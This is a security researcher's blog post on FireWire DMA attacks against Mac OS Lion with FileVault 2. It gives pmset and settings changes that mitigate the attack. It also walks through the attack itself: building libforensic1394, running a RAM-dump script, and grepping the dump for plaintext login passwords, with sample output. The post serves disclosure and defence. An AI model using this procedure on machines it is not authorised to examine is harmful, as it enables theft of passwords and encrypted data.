There is some question about the extent to which Lion and FileVault is vulnerable to Firewire DMA attacks.  I performed some research (full paper is available below) and can present the following results:

Retrieving plain text passwords from RAM on Mac OS Lion (10.7) can be done under most circumstances where the system is using the default configuration.  But, I want to point out that this definitely isn’t a fatal flaw in FileVault 2′s design and that it is quite easy to mitigate against these attacks.  Unfortunately, Lion is not “secure by default”.

Here is a quick summary of what states are susceptible to the attack:

For a more-depth discussion of why, please see the paper (at the bottom of this post.)

Stopping the Attack

Protecting against the attack is pretty simple (assuming that FV2 is turned on,) requiring three configuration settings to be modified (Fast User Switching, and a couple of sleep options.) This will protect the system as long as it isn’t running and unlocked (in which case it is insecure anyway,) and if you haven’t logged out and left the system running (I don’t have any suggestions on that one.)  Here is how . . .

Fast User Switching

This feature can be disabled in the System Preferences, by selecting “Users and Groups”, clicking on “Login Options”, and unselecting the “Show fast User switching menu as” check box:

Changing Sleep Options:

These settings must be changed from the command line, as the root user, using the “pmset” command.  There are two relevant options:

Option	Value	Description
destroyfvkeyonstandby	1	Removes the full volume encryption key from RAM when the system is put into sleep mode and is dependent on the value of hibernatemode.
hibernatemode	25	Forces the system to immediately write RAM to disk and remove power from memory upon sleep.

For example:

sudo pmset -a destroyfvkeyonstandby 1 hibernatemode 25

Performing the Attack

libforensic1394

I used Freddie Witherden’s libforensic1394 libraries to connect over Firewire and dump the RAM into a binary file.  I couldn’t find a script that used the libraries to perform the dump, so I wrote a small Python script that uses the library.  It also is capable (tested, and confirmed) of performing DMA imaging of Windows 7, and Linux 2.6 systems with Firewire.  The script is available here (ramdump.py).

Getting the libaries built is pretty simple.  I tested on a Ubuntu 11.04 system, and a few libraries and programs that are needed weren’t installed by default:

sudo apt-get install gcc g++ cmake linux-headers-generic

The build directions that Freddie Witherden provides are straight forward.  Once built you can perform a capture and grab passwords:

tag@ubuntu11:~$ sudo -s
[sudo] password for tag:
root@ubuntu11:~# ./ramdump.py 1024 f
SBP-2 not used, forcing 2048 byte pages.
[<forensic1394.device.Device object at 0x1078250>]
Attempting to access device 0: Apple Computer, Inc. Macintosh
Wrote file ramdump.bin.
root@ubuntu11:~# strings ramdump.bin |grep --after-context=3 managedUser \
>          |grep --after-context=1 password
password
password1
shell
--
password
shell
root@ubuntu11:~#

The password is highlighted in Red above.

More Details

If you want more information please read the paper.  The full text of the paper is available under a Creative Commons license.

Local Copy in PDF Format (272K) | Read online as a Google Doc

There is also a short PowerPoint available that provides a high-level overview.

Local Copy in PPTX Format (266K) | Read online as a Google Doc (didn’t format well, sorry.)